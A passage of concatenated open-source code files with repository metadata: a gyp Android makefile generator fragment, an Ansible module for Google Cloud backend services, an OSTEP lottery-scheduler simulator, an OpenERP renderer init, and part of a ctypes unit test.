default_configuration = spec['default_configuration']
break
if not default_configuration:
default_configuration = 'Default'
srcdir = '.'
makefile_name = 'GypAndroid' + options.suffix + '.mk'
makefile_path = os.path.join(options.toplevel_dir, makefile_name)
assert not options.generator_output, (
'The Android backend does not support options.generator_output.')
gyp.common.EnsureDirExists(makefile_path)
root_makefile = open(makefile_path, 'w')
root_makefile.write(header)
# We set LOCAL_PATH just once, here, to the top of the project tree. This
# allows all the other paths we use to be relative to the Android.mk file,
# as the Android build system expects.
root_makefile.write('\nLOCAL_PATH := $(call my-dir)\n')
# Find the list of targets that derive from the gyp file(s) being built.
needed_targets = set()
for build_file in params['build_files']:
for target in gyp.common.AllTargets(target_list, target_dicts, build_file):
needed_targets.add(target)
build_files = set()
include_list = set()
android_modules = {}
for qualified_target in target_list:
build_file, target, toolset = gyp.common.ParseQualifiedTarget(
qualified_target)
relative_build_file = gyp.common.RelativePath(build_file,
options.toplevel_dir)
build_files.add(relative_build_file)
included_files = data[build_file]['included_files']
for included_file in included_files:
# The included_files entries are relative to the dir of the build file
# that included them, so we have to undo that and then make them relative
# to the root dir.
relative_include_file = gyp.common.RelativePath(
gyp.common.UnrelativePath(included_file, build_file),
options.toplevel_dir)
abs_include_file = os.path.abspath(relative_include_file)
# If the include file is from the ~/.gyp dir, we should use absolute path
# so that relocating the src dir doesn't break the path.
if (params['home_dot_gyp'] and
abs_include_file.startswith(params['home_dot_gyp'])):
build_files.add(abs_include_file)
else:
build_files.add(relative_include_file)
base_path, output_file = CalculateMakefilePath(build_file,
target + '.' + toolset + options.suffix + '.mk')
spec = target_dicts[qualified_target]
configs = spec['configurations']
part_of_all = qualified_target in needed_targets
if limit_to_target_all and not part_of_all:
continue
relative_target = gyp.common.QualifiedTarget(relative_build_file, target,
toolset)
writer = AndroidMkWriter(android_top_dir)
android_module = writer.Write(qualified_target, relative_target, base_path,
output_file, spec, configs,
part_of_all=part_of_all,
write_alias_target=write_alias_targets,
sdk_version=sdk_version)
if android_module in android_modules:
print ('ERROR: Android module names must be unique. The following '
'targets both generate Android module name %s.\n %s\n %s' %
(android_module, android_modules[android_module],
qualified_target))
return
android_modules[android_module] = qualified_target
# Our root_makefile lives at the source root. Compute the relative path
# from there to the output_file for including.
mkfile_rel_path = gyp.common.RelativePath(output_file,
os.path.dirname(makefile_path))
include_list.add(mkfile_rel_path)
root_makefile.write('GYP_CONFIGURATION ?= %s\n' % default_configuration)
root_makefile.write('GYP_VAR_PREFIX ?=\n')
root_makefile.write('GYP_HOST_VAR_PREFIX ?=\n')
root_makefile.write('GYP_HOST_MULTILIB ?= first\n')
# Write out the sorted list of includes.
root_makefile.write('\n')
for include_file in sorted(include_list):
root_makefile.write('include $(LOCAL_PATH)/' + include_file + '\n')
root_makefile.write('\n')
if write_alias_targets:
root_makefile.write(ALL_MODULES_FOOTER)
root_makefile.close()
|
mit
|
fxfitz/ansible
|
lib/ansible/modules/cloud/google/gcp_compute_backend_service.py
|
14
|
36795
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ["preview"],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_backend_service
description:
- Creates a BackendService resource in the specified project using the data included
in the request.
short_description: Creates a GCP BackendService
version_added: 2.6
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
state:
description:
- Whether the given object should exist in GCP
choices: ['present', 'absent']
default: 'present'
affinity_cookie_ttl_sec:
description:
- Lifetime of cookies in seconds if session_affinity is GENERATED_COOKIE. If set to
0, the cookie is non-persistent and lasts only until the end of the browser session
(or equivalent). The maximum allowed value for TTL is one day.
- When the load balancing scheme is INTERNAL, this field is not used.
required: false
backends:
description:
- The list of backends that serve this BackendService.
required: false
suboptions:
balancing_mode:
description:
- Specifies the balancing mode for this backend.
- For global HTTP(S) or TCP/SSL load balancing, the default is UTILIZATION. Valid
values are UTILIZATION, RATE (for HTTP(S)) and CONNECTION (for TCP/SSL).
- This cannot be used for internal load balancing.
required: false
choices: ['UTILIZATION', 'RATE', 'CONNECTION']
capacity_scaler:
description:
- A multiplier applied to the group's maximum servicing capacity (based on UTILIZATION,
RATE or CONNECTION).
- Default value is 1, which means the group will serve up to 100% of its configured
capacity (depending on balancingMode). A setting of 0 means the group is completely
drained, offering 0% of its available Capacity. Valid range is [0.0,1.0].
- This cannot be used for internal load balancing.
required: false
description:
description:
- An optional description of this resource.
- Provide this property when you create the resource.
required: false
group:
description:
- A reference to InstanceGroup resource.
required: false
max_connections:
description:
- The max number of simultaneous connections for the group. Can be used with either
CONNECTION or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or maxConnectionsPerInstance must be
set.
- This cannot be used for internal load balancing.
required: false
max_connections_per_instance:
description:
- The max number of simultaneous connections that a single backend instance can handle.
This is used to calculate the capacity of the group. Can be used in either CONNECTION
or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or maxConnectionsPerInstance must be
set.
- This cannot be used for internal load balancing.
required: false
max_rate:
description:
- The max requests per second (RPS) of the group.
- Can be used with either RATE or UTILIZATION balancing modes, but required if RATE
mode. For RATE mode, either maxRate or maxRatePerInstance must be set.
- This cannot be used for internal load balancing.
required: false
max_rate_per_instance:
description:
- The max requests per second (RPS) that a single backend instance can handle. This
is used to calculate the capacity of the group. Can be used in either balancing
mode. For RATE mode, either maxRate or maxRatePerInstance must be set.
- This cannot be used for internal load balancing.
required: false
max_utilization:
description:
- Used when balancingMode is UTILIZATION. This ratio defines the CPU utilization target
for the group. The default is 0.8. Valid range is [0.0, 1.0].
- This cannot be used for internal load balancing.
required: false
cdn_policy:
description:
- Cloud CDN configuration for this BackendService.
required: false
suboptions:
cache_key_policy:
description:
- The CacheKeyPolicy for this CdnPolicy.
required: false
suboptions:
include_host:
description:
- If true requests to different hosts will be cached separately.
required: false
type: bool
include_protocol:
description:
- If true, http and https requests will be cached separately.
required: false
type: bool
include_query_string:
description:
- If true, include query string parameters in the cache key according to query_string_whitelist
and query_string_blacklist. If neither is set, the entire query string will be included.
- If false, the query string will be excluded from the cache key entirely.
required: false
type: bool
query_string_blacklist:
description:
- Names of query string parameters to exclude in cache keys.
- All other parameters will be included. Either specify query_string_whitelist or
query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
required: false
query_string_whitelist:
description:
- Names of query string parameters to include in cache keys.
- All other parameters will be excluded. Either specify query_string_whitelist or
query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
required: false
connection_draining:
description:
- Settings for connection draining.
required: false
suboptions:
draining_timeout_sec:
description:
- Time for which the instance will be drained (it will not accept new connections,
but will still finish work already started).
required: false
description:
description:
- An optional description of this resource.
required: false
enable_cdn:
description:
- If true, enable Cloud CDN for this BackendService.
- When the load balancing scheme is INTERNAL, this field is not used.
required: false
type: bool
health_checks:
description:
- The list of URLs to the HttpHealthCheck or HttpsHealthCheck resource for health
checking this BackendService. Currently at most one health check can be specified,
and a health check is required.
- For internal load balancing, a URL to a HealthCheck resource must be specified instead.
required: false
name:
description:
- Name of the resource. Provided by the client when the resource is created. The name
must be 1-63 characters long, and comply with RFC1035. Specifically, the name must
be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following characters
must be a dash, lowercase letter, or digit, except the last character, which cannot
be a dash.
required: false
port_name:
description:
- Name of backend port. The same name should appear in the instance groups referenced
by this service. Required when the load balancing scheme is EXTERNAL.
- When the load balancing scheme is INTERNAL, this field is not used.
required: false
protocol:
description:
- The protocol this BackendService uses to communicate with backends.
- Possible values are HTTP, HTTPS, TCP, and SSL. The default is HTTP.
- For internal load balancing, the possible values are TCP and UDP, and the default
is TCP.
required: false
choices: ['HTTP', 'HTTPS', 'TCP', 'SSL']
region:
description:
- A reference to Region resource.
required: false
session_affinity:
description:
- Type of session affinity to use. The default is NONE.
- When the load balancing scheme is EXTERNAL, can be NONE, CLIENT_IP, or GENERATED_COOKIE.
- When the load balancing scheme is INTERNAL, can be NONE, CLIENT_IP, CLIENT_IP_PROTO,
or CLIENT_IP_PORT_PROTO.
- When the protocol is UDP, this field is not used.
required: false
choices: ['NONE', 'CLIENT_IP', 'GENERATED_COOKIE', 'CLIENT_IP_PROTO', 'CLIENT_IP_PORT_PROTO']
timeout_sec:
description:
- How many seconds to wait for the backend before considering it a failed request.
Default is 30 seconds. Valid range is [1, 86400].
required: false
aliases: [timeout_seconds]
extends_documentation_fragment: gcp
'''
EXAMPLES = '''
- name: create an instance group
gcp_compute_instance_group:
name: 'instancegroup-backendservice'
zone: 'us-central1-a'
project: "{{ gcp_project }}"
auth_kind: "{{ gcp_cred_kind }}"
service_account_file: "{{ gcp_cred_file }}"
scopes:
- https://www.googleapis.com/auth/compute
state: present
register: instancegroup
- name: create an http health check
gcp_compute_http_health_check:
name: 'httphealthcheck-backendservice'
healthy_threshold: 10
port: 8080
timeout_sec: 2
unhealthy_threshold: 5
project: "{{ gcp_project }}"
auth_kind: "{{ gcp_cred_kind }}"
service_account_file: "{{ gcp_cred_file }}"
scopes:
- https://www.googleapis.com/auth/compute
state: present
register: healthcheck
- name: create a backend service
gcp_compute_backend_service:
name: testObject
backends:
- group: "{{ instancegroup }}"
health_checks:
- "{{ healthcheck.selfLink }}"
enable_cdn: true
project: testProject
auth_kind: service_account
service_account_file: /tmp/auth.pem
scopes:
- https://www.googleapis.com/auth/compute
state: present
'''
RETURN = '''
affinity_cookie_ttl_sec:
description:
- Lifetime of cookies in seconds if session_affinity is GENERATED_COOKIE. If set to
0, the cookie is non-persistent and lasts only until the end of the browser session
(or equivalent). The maximum allowed value for TTL is one day.
- When the load balancing scheme is INTERNAL, this field is not used.
returned: success
type: int
backends:
description:
- The list of backends that serve this BackendService.
returned: success
type: complex
contains:
balancing_mode:
description:
- Specifies the balancing mode for this backend.
- For global HTTP(S) or TCP/SSL load balancing, the default is UTILIZATION. Valid
values are UTILIZATION, RATE (for HTTP(S)) and CONNECTION (for TCP/SSL).
- This cannot be used for internal load balancing.
returned: success
type: str
capacity_scaler:
description:
- A multiplier applied to the group's maximum servicing capacity (based on UTILIZATION,
RATE or CONNECTION).
- Default value is 1, which means the group will serve up to 100% of its configured
capacity (depending on balancingMode). A setting of 0 means the group is completely
drained, offering 0% of its available Capacity. Valid range is [0.0,1.0].
- This cannot be used for internal load balancing.
returned: success
type: str
description:
description:
- An optional description of this resource.
- Provide this property when you create the resource.
returned: success
type: str
group:
description:
- A reference to InstanceGroup resource.
returned: success
type: dict
max_connections:
description:
- The max number of simultaneous connections for the group. Can be used with either
CONNECTION or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or maxConnectionsPerInstance must be
set.
- This cannot be used for internal load balancing.
returned: success
type: int
max_connections_per_instance:
description:
- The max number of simultaneous connections that a single backend instance can handle.
This is used to calculate the capacity of the group. Can be used in either CONNECTION
or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or maxConnectionsPerInstance must be
set.
- This cannot be used for internal load balancing.
returned: success
type: int
max_rate:
description:
- The max requests per second (RPS) of the group.
- Can be used with either RATE or UTILIZATION balancing modes, but required if RATE
mode. For RATE mode, either maxRate or maxRatePerInstance must be set.
- This cannot be used for internal load balancing.
returned: success
type: int
max_rate_per_instance:
description:
- The max requests per second (RPS) that a single backend instance can handle. This
is used to calculate the capacity of the group. Can be used in either balancing
mode. For RATE mode, either maxRate or maxRatePerInstance must be set.
- This cannot be used for internal load balancing.
returned: success
type: str
max_utilization:
description:
- Used when balancingMode is UTILIZATION. This ratio defines the CPU utilization target
for the group. The default is 0.8. Valid range is [0.0, 1.0].
- This cannot be used for internal load balancing.
returned: success
type: str
cdn_policy:
description:
- Cloud CDN configuration for this BackendService.
returned: success
type: complex
contains:
cache_key_policy:
description:
- The CacheKeyPolicy for this CdnPolicy.
returned: success
type: complex
contains:
include_host:
description:
- If true requests to different hosts will be cached separately.
returned: success
type: bool
include_protocol:
description:
- If true, http and https requests will be cached separately.
returned: success
type: bool
include_query_string:
description:
- If true, include query string parameters in the cache key according to query_string_whitelist
and query_string_blacklist. If neither is set, the entire query string will be included.
- If false, the query string will be excluded from the cache key entirely.
returned: success
type: bool
query_string_blacklist:
description:
- Names of query string parameters to exclude in cache keys.
- All other parameters will be included. Either specify query_string_whitelist or
query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
returned: success
type: list
query_string_whitelist:
description:
- Names of query string parameters to include in cache keys.
- All other parameters will be excluded. Either specify query_string_whitelist or
query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
returned: success
type: list
connection_draining:
description:
- Settings for connection draining.
returned: success
type: complex
contains:
draining_timeout_sec:
description:
- Time for which the instance will be drained (it will not accept new connections,
but will still finish work already started).
returned: success
type: int
creation_timestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
description:
description:
- An optional description of this resource.
returned: success
type: str
enable_cdn:
description:
- If true, enable Cloud CDN for this BackendService.
- When the load balancing scheme is INTERNAL, this field is not used.
returned: success
type: bool
health_checks:
description:
- The list of URLs to the HttpHealthCheck or HttpsHealthCheck resource for health
checking this BackendService. Currently at most one health check can be specified,
and a health check is required.
- For internal load balancing, a URL to a HealthCheck resource must be specified instead.
returned: success
type: list
id:
description:
- The unique identifier for the resource.
returned: success
type: int
name:
description:
- Name of the resource. Provided by the client when the resource is created. The name
must be 1-63 characters long, and comply with RFC1035. Specifically, the name must
be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following characters
must be a dash, lowercase letter, or digit, except the last character, which cannot
be a dash.
returned: success
type: str
port_name:
description:
- Name of backend port. The same name should appear in the instance groups referenced
by this service. Required when the load balancing scheme is EXTERNAL.
- When the load balancing scheme is INTERNAL, this field is not used.
returned: success
type: str
protocol:
description:
- The protocol this BackendService uses to communicate with backends.
- Possible values are HTTP, HTTPS, TCP, and SSL. The default is HTTP.
- For internal load balancing, the possible values are TCP and UDP, and the default
is TCP.
returned: success
type: str
region:
description:
- A reference to Region resource.
returned: success
type: str
session_affinity:
description:
- Type of session affinity to use. The default is NONE.
- When the load balancing scheme is EXTERNAL, can be NONE, CLIENT_IP, or GENERATED_COOKIE.
- When the load balancing scheme is INTERNAL, can be NONE, CLIENT_IP, CLIENT_IP_PROTO,
or CLIENT_IP_PORT_PROTO.
- When the protocol is UDP, this field is not used.
returned: success
type: str
timeout_sec:
description:
- How many seconds to wait for the backend before considering it a failed request.
Default is 30 seconds. Valid range is [1, 86400].
returned: success
type: int
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, remove_nones_from_dict, replace_resource_dict
import json
import re
import time
################################################################################
# Main
################################################################################
def main():
"""Main function"""
module = GcpModule(
argument_spec=dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
affinity_cookie_ttl_sec=dict(type='int'),
backends=dict(type='list', elements='dict', options=dict(
balancing_mode=dict(type='str', choices=['UTILIZATION', 'RATE', 'CONNECTION']),
capacity_scaler=dict(type='str'),
description=dict(type='str'),
group=dict(type='dict'),
max_connections=dict(type='int'),
max_connections_per_instance=dict(type='int'),
max_rate=dict(type='int'),
max_rate_per_instance=dict(type='str'),
max_utilization=dict(type='str')
)),
cdn_policy=dict(type='dict', options=dict(
cache_key_policy=dict(type='dict', options=dict(
include_host=dict(type='bool'),
include_protocol=dict(type='bool'),
include_query_string=dict(type='bool'),
query_string_blacklist=dict(type='list', elements='str'),
query_string_whitelist=dict(type='list', elements='str')
))
)),
connection_draining=dict(type='dict', options=dict(
draining_timeout_sec=dict(type='int')
)),
description=dict(type='str'),
enable_cdn=dict(type='bool'),
health_checks=dict(type='list', elements='str'),
name=dict(type='str'),
port_name=dict(type='str'),
protocol=dict(type='str', choices=['HTTP', 'HTTPS', 'TCP', 'SSL']),
region=dict(type='str'),
session_affinity=dict(type='str', choices=['NONE', 'CLIENT_IP', 'GENERATED_COOKIE', 'CLIENT_IP_PROTO', 'CLIENT_IP_PORT_PROTO']),
timeout_sec=dict(type='int', aliases=['timeout_seconds'])
)
)
state = module.params['state']
kind = 'compute#backendService'
fetch = fetch_resource(module, self_link(module), kind)
changed = False
if fetch:
if state == 'present':
if is_different(module, fetch):
fetch = update(module, self_link(module), kind, fetch)
changed = True
else:
delete(module, self_link(module), kind, fetch)
fetch = {}
changed = True
else:
if state == 'present':
fetch = create(module, collection(module), kind)
changed = True
else:
fetch = {}
fetch.update({'changed': changed})
module.exit_json(**fetch)
def create(module, link, kind):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.post(link, resource_to_request(module)))
def update(module, link, kind, fetch):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.put(link, resource_to_request(module)))
def delete(module, link, kind, fetch):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.delete(link))
def resource_to_request(module):
request = {
u'kind': 'compute#backendService',
u'affinityCookieTtlSec': module.params.get('affinity_cookie_ttl_sec'),
u'backends': BackendServiceBackendArray(module.params.get('backends', []), module).to_request(),
u'cdnPolicy': BackeServiCdnPolic(module.params.get('cdn_policy', {}), module).to_request(),
u'connectionDraining': BackeServiConneDrain(module.params.get('connection_draining', {}), module).to_request(),
u'description': module.params.get('description'),
u'enableCDN': module.params.get('enable_cdn'),
u'healthChecks': module.params.get('health_checks'),
u'name': module.params.get('name'),
u'portName': module.params.get('port_name'),
u'protocol': module.params.get('protocol'),
u'region': region_selflink(module.params.get('region'), module.params),
u'sessionAffinity': module.params.get('session_affinity'),
u'timeoutSec': module.params.get('timeout_sec')
}
return_vals = {}
for k, v in request.items():
if v:
return_vals[k] = v
return return_vals
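# Note (illustrative, not part of the generated module): the filtering loop
# above only keeps truthy values, so for example enable_cdn=False or
# timeout_sec=0 would be omitted from the request body entirely.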
def fetch_resource(module, link, kind):
auth = GcpSession(module, 'compute')
return return_if_object(module, auth.get(link), kind)
def self_link(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/global/backendServices/{name}".format(**module.params)
def collection(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/global/backendServices".format(**module.params)
def return_if_object(module, response, kind):
# If not found, return nothing.
if response.status_code == 404:
return None
# If no content, return nothing.
if response.status_code == 204:
return None
try:
module.raise_for_status(response)
result = response.json()
except getattr(json.decoder, 'JSONDecodeError', ValueError) as inst:
module.fail_json(msg="Invalid JSON response with error: %s" % inst)
if navigate_hash(result, ['error', 'errors']):
module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
if result['kind'] != kind:
module.fail_json(msg="Incorrect result: {kind}".format(**result))
return result
def is_different(module, response):
request = resource_to_request(module)
response = response_to_hash(module, response)
# Remove all output-only from response.
response_vals = {}
for k, v in response.items():
if k in request:
response_vals[k] = v
request_vals = {}
for k, v in request.items():
if k in response:
request_vals[k] = v
return GcpRequest(request_vals) != GcpRequest(response_vals)
# Remove unnecessary properties from the response.
# This is for doing comparisons with Ansible's current parameters.
def response_to_hash(module, response):
return {
u'affinityCookieTtlSec': response.get(u'affinityCookieTtlSec'),
u'backends': BackendServiceBackendArray(response.get(u'backends', []), module).from_response(),
u'cdnPolicy': BackeServiCdnPolic(response.get(u'cdnPolicy', {}), module).from_response(),
u'connectionDraining': BackeServiConneDrain(response.get(u'connectionDraining', {}), module).from_response(),
u'creationTimestamp': response.get(u'creationTimestamp'),
u'description': response.get(u'description'),
u'enableCDN': response.get(u'enableCDN'),
u'healthChecks': response.get(u'healthChecks'),
u'id': response.get(u'id'),
u'name': response.get(u'name'),
u'portName': response.get(u'portName'),
u'protocol': response.get(u'protocol'),
u'region': response.get(u'region'),
u'sessionAffinity': response.get(u'sessionAffinity'),
u'timeoutSec': response.get(u'timeoutSec')
}
def region_selflink(name, params):
if name is None:
return
url = r"https://www.googleapis.com/compute/v1/projects/.*/regions/[a-z1-9\-]*"
if not re.match(url, name):
name = "https://www.googleapis.com/compute/v1/projects/{project}/regions/%s".format(**params) % name
return name
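# Illustrative usage (hypothetical project/region values):
#   region_selflink('us-central1', {'project': 'my-project'})
#   -> 'https://www.googleapis.com/compute/v1/projects/my-project/regions/us-central1'
# A value that already matches the full region URL pattern is returned as-is.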
def async_op_url(module, extra_data=None):
if extra_data is None:
extra_data = {}
url = "https://www.googleapis.com/compute/v1/projects/{project}/global/operations/{op_id}"
combined = extra_data.copy()
combined.update(module.params)
return url.format(**combined)
def wait_for_operation(module, response):
op_result = return_if_object(module, response, 'compute#operation')
if op_result is None:
return None
status = navigate_hash(op_result, ['status'])
wait_done = wait_for_completion(status, op_result, module)
return fetch_resource(module, navigate_hash(wait_done, ['targetLink']), 'compute#backendService')
def wait_for_completion(status, op_result, module):
op_id = navigate_hash(op_result, ['name'])
op_uri = async_op_url(module, {'op_id': op_id})
while status != 'DONE':
raise_if_errors(op_result, ['error', 'errors'], module)
time.sleep(1.0)
if status not in ['PENDING', 'RUNNING', 'DONE']:
module.fail_json(msg="Invalid result %s" % status)
op_result = fetch_resource(module, op_uri, 'compute#operation')
status = navigate_hash(op_result, ['status'])
return op_result
def raise_if_errors(response, err_path, module):
errors = navigate_hash(response, err_path)
if errors is not None:
module.fail_json(msg=errors)
class BackendServiceBackendArray(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = []
def to_request(self):
items = []
for item in self.request:
items.append(self._request_for_item(item))
return items
def from_response(self):
items = []
for item in self.request:
items.append(self._response_from_item(item))
return items
def _request_for_item(self, item):
return remove_nones_from_dict({
u'balancingMode': item.get('balancing_mode'),
u'capacityScaler': item.get('capacity_scaler'),
u'description': item.get('description'),
u'group': replace_resource_dict(item.get(u'group', {}), 'selfLink'),
u'maxConnections': item.get('max_connections'),
u'maxConnectionsPerInstance': item.get('max_connections_per_instance'),
u'maxRate': item.get('max_rate'),
u'maxRatePerInstance': item.get('max_rate_per_instance'),
u'maxUtilization': item.get('max_utilization')
})
def _response_from_item(self, item):
return remove_nones_from_dict({
u'balancingMode': item.get(u'balancingMode'),
u'capacityScaler': item.get(u'capacityScaler'),
u'description': item.get(u'description'),
u'group': item.get(u'group'),
u'maxConnections': item.get(u'maxConnections'),
u'maxConnectionsPerInstance': item.get(u'maxConnectionsPerInstance'),
u'maxRate': item.get(u'maxRate'),
u'maxRatePerInstance': item.get(u'maxRatePerInstance'),
u'maxUtilization': item.get(u'maxUtilization')
})
class BackeServiCdnPolic(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({
u'cacheKeyPolicy': BackServCachKeyPoli(self.request.get('cache_key_policy', {}), self.module).to_request()
})
def from_response(self):
return remove_nones_from_dict({
u'cacheKeyPolicy': BackServCachKeyPoli(self.request.get(u'cacheKeyPolicy', {}), self.module).from_response()
})
class BackServCachKeyPoli(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({
u'includeHost': self.request.get('include_host'),
u'includeProtocol': self.request.get('include_protocol'),
u'includeQueryString': self.request.get('include_query_string'),
u'queryStringBlacklist': self.request.get('query_string_blacklist'),
u'queryStringWhitelist': self.request.get('query_string_whitelist')
})
def from_response(self):
return remove_nones_from_dict({
u'includeHost': self.request.get(u'includeHost'),
u'includeProtocol': self.request.get(u'includeProtocol'),
u'includeQueryString': self.request.get(u'includeQueryString'),
u'queryStringBlacklist': self.request.get(u'queryStringBlacklist'),
u'queryStringWhitelist': self.request.get(u'queryStringWhitelist')
})
class BackeServiConneDrain(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({
u'drainingTimeoutSec': self.request.get('draining_timeout_sec')
})
def from_response(self):
return remove_nones_from_dict({
u'drainingTimeoutSec': self.request.get(u'drainingTimeoutSec')
})
if __name__ == '__main__':
main()
|
gpl-3.0
|
ring00/bbl-ucore
|
related_info/ostep/ostep10-lottery.py
|
54
|
3990
|
#! /usr/bin/env python
import sys
from optparse import OptionParser
import random
parser = OptionParser()
parser.add_option('-s', '--seed', default=0, help='the random seed', action='store', type='int', dest='seed')
parser.add_option('-j', '--jobs', default=3, help='number of jobs in the system', action='store', type='int', dest='jobs')
parser.add_option('-l', '--jlist', default='', help='instead of random jobs, provide a comma-separated list of run times and ticket values (e.g., 10:100,20:100 would have two jobs with run-times of 10 and 20, each with 100 tickets)', action='store', type='string', dest='jlist')
parser.add_option('-m', '--maxlen', default=10, help='max length of job', action='store', type='int', dest='maxlen')
parser.add_option('-T', '--maxticket', default=100, help='maximum ticket value, if randomly assigned', action='store', type='int', dest='maxticket')
parser.add_option('-q', '--quantum', default=1, help='length of time slice', action='store', type='int', dest='quantum')
parser.add_option('-c', '--compute', help='compute answers for me', action='store_true', default=False, dest='solve')
(options, args) = parser.parse_args()
random.seed(options.seed)
print 'ARG jlist', options.jlist
print 'ARG jobs', options.jobs
print 'ARG maxlen', options.maxlen
print 'ARG maxticket', options.maxticket
print 'ARG quantum', options.quantum
print 'ARG seed', options.seed
print ''
print 'Here is the job list, with the run time of each job: '
import operator
tickTotal = 0
runTotal = 0
joblist = []
if options.jlist == '':
for jobnum in range(0,options.jobs):
runtime = int(options.maxlen * random.random())
tickets = int(options.maxticket * random.random())
runTotal += runtime
tickTotal += tickets
joblist.append([jobnum, runtime, tickets])
print ' Job %d ( length = %d, tickets = %d )' % (jobnum, runtime, tickets)
else:
jobnum = 0
for entry in options.jlist.split(','):
(runtime, tickets) = entry.split(':')
joblist.append([jobnum, int(runtime), int(tickets)])
runTotal += int(runtime)
tickTotal += int(tickets)
jobnum += 1
for job in joblist:
print ' Job %d ( length = %d, tickets = %d )' % (job[0], job[1], job[2])
print '\n'
if options.solve == False:
print 'Here is the set of random numbers you will need (at most):'
for i in range(runTotal):
r = int(random.random() * 1000001)
print 'Random', r
if options.solve == True:
print '** Solutions **\n'
jobs = len(joblist)
clock = 0
for i in range(runTotal):
r = int(random.random() * 1000001)
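        # Draw a winning ticket in [0, tickTotal) and walk the job list,
        # accumulating ticket counts until the winner's owner is found.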
winner = int(r % tickTotal)
current = 0
for (job, runtime, tickets) in joblist:
current += tickets
if current > winner:
(wjob, wrun, wtix) = (job, runtime, tickets)
break
print 'Random', r, '-> Winning ticket %d (of %d) -> Run %d' % (winner, tickTotal, wjob)
# print 'Winning ticket %d (of %d) -> Run %d' % (winner, tickTotal, wjob)
print ' Jobs:',
for (job, runtime, tickets) in joblist:
if wjob == job:
wstr = '*'
else:
wstr = ' '
if runtime > 0:
tstr = tickets
else:
tstr = '---'
print ' (%s job:%d timeleft:%d tix:%s ) ' % (wstr, job, runtime, tstr),
print ''
# now do the accounting
if wrun >= options.quantum:
wrun -= options.quantum
else:
wrun = 0
clock += options.quantum
# job completed!
if wrun == 0:
print '--> JOB %d DONE at time %d' % (wjob, clock)
tickTotal -= wtix
wtix = 0
jobs -= 1
# update job list
joblist[wjob] = (wjob, wrun, wtix)
if jobs == 0:
print ''
break
|
gpl-2.0
|
colinligertwood/odoo
|
openerp/report/render/rml2txt/__init__.py
|
381
|
1351
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from rml2txt import parseString, parseNode
""" This engine is the minimalistic renderer of RML documents into text files,
using spaces and newlines to format.
It was needed in some special applications, where legal reports need to be
printed on special (dot-matrix) printers.
"""
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
orangeduck/PyAutoC
|
Python27/Lib/ctypes/test/test_array_in_pointer.py
|
117
|
1729
|
import unittest
from ctypes import *
from binascii import hexlify
import re
def dump(obj):
# helper function to dump memory contents in hex, with a hyphen
# between the bytes.
h = hexlify(memoryview(obj))
return re.sub(r"(..)", r"\1-", h)[:-1]
class Value(Structure):
_fields_ = [("val", c_byte)]
class Container(Structure):
_fields_ = [("pvalues", POINTER(Value))]
class Test(unittest.TestCase):
def test(self):
# create an array of 4 values
val_array = (Value * 4)()
# create a container, which holds a pointer to the pvalues array.
c = Container()
c.pvalues = val_array
# memory contains 4 NUL bytes now, that's correct
self.assertEqual("00-00-00-00", dump(val_array))
# set the values of the array through the pointer:
for i in range(4):
c.pvalues[i].val = i + 1
values = [c.pvalues[i].val for i in range(4)]
        # These are the expected results: here's the bug!
self.assertEqual(
(values, dump(val_array)),
([1, 2, 3, 4], "01-02-03-04")
)
def test_2(self):
val_array = (Value * 4)()
# memory contains 4 NUL bytes now, that's correct
self.assertEqual("00-00-00-00", dump(val_array))
